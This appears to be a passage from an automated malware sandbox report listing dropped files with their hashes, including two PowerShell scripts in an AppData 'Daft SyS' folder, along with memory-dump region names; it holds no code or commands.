C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6c4805e00673bef922d51b1a7137028f |
| SHA1 | 0eabb38482d1733dd85a2af9c5342c2cafcd41eb |
| SHA256 | 7af7d25fe7e3bb8b75bcffaa8573e2e9af7e7f70a840fa8bc0196d0ab396ecdd |
| SHA512 | eb6dacb4e0da6f45028ebf65ebffdc6aecdb6a34a582bb69aa5836ef02a7115f6b500ef2dd6a2c2be994ec9d0cbbff564368724593666105d3d4475441830cc1 |
memory/4808-111-0x000001ECAC050000-0x000001ECAC068000-memory.dmp
memory/4808-112-0x000001ECABC30000-0x000001ECABC36000-memory.dmp
memory/2524-130-0x00007FF822310000-0x00007FF822320000-memory.dmp
memory/2524-129-0x00007FF822310000-0x00007FF822320000-memory.dmp
memory/2524-128-0x00007FF822310000-0x00007FF822320000-memory.dmp
memory/2524-127-0x00007FF822310000-0x00007FF822320000-memory.dmp
memory/2524-131-0x00007FF862290000-0x00007FF862485000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Daft SyS\x2.ps1
| MD5 | b141032fc27557e652dbaf28bdd48dcf |
| SHA1 | 733fa3581410a4d450b8dcfacf16ab74352b4453 |
| SHA256 | 6521823e3cc8a09664fd1db0c845d53a43d3253d69687b7c307d5e817d34ec0c |
| SHA512 | b948bd78a7354aa4dc01eaf3e06ba72727b9ffbe462e405b5e7c788acd985a980bf7ef0ff5ea29b5e7e2834ffde88a4c19e12df0281239189dd16de5247f2b10 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 641727f6e43739ea45e79725fc622ae3 |
| SHA1 | c9eb462c5739e508a25b99d603ae7dba3946a1f6 |
| SHA256 | 465fe52cdaadf696aac89d86337c39b60cbb0f3c98a8c1a12b0bfe8443bca80d |
| SHA512 | b221135371df74d36994b47c0788a32d06b0ce5522127902f7cae083e4f6563736f56f0bb06113e452acf87e6a756f44fea522b5f0db75be1203c6a24bfada6a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d255504cb22d7dce432c9ef4188f05a5 |
| SHA1 | c0b1ce40c879d98fd32bde7d397f26d38996427a |
| SHA256 | c4870d8fb8553880c55e15cd646dda458c7299f0a9ad487a81941a1dbcf9de84 |
| SHA512 | d13c8e33dd42bb49f076e3a932bc634577ee9462ad9aa2ba26cc67243794b28342c6db59df5d07bc15c70f2cc0e36e29a8c564e6842bead382a1c9b46b0a7846 |
C:\Users\Admin\AppData\LocalLow\Daft SyS\isltf.ps1
| MD5 | c48ca9208d2d72f7c4aadc4552c4371c |
| SHA1 | 009a66081262d0e7ac6d9654f4d19ffe8f7b9965 |
| SHA256 | 488da21024f08719000d1c44b00bf74fa4343eb1cccffb786efac08cba079fd5 |
| SHA512 | 404b0062421b807cace5d4ab37b8379373045fe57bb3a020b98484b56adc1096c929319194f190edba247959a8dce7c6097b393d6a811e75941ff586e9ac71e0 |
memory/4076-152-0x0000021FE97B0000-0x0000021FE97BA000-memory.dmp
memory/4360-153-0x0000000000400000-0x000000000040A000-memory.dmp
memory/4360-155-0x0000000005DA0000-0x0000000006344000-memory.dmp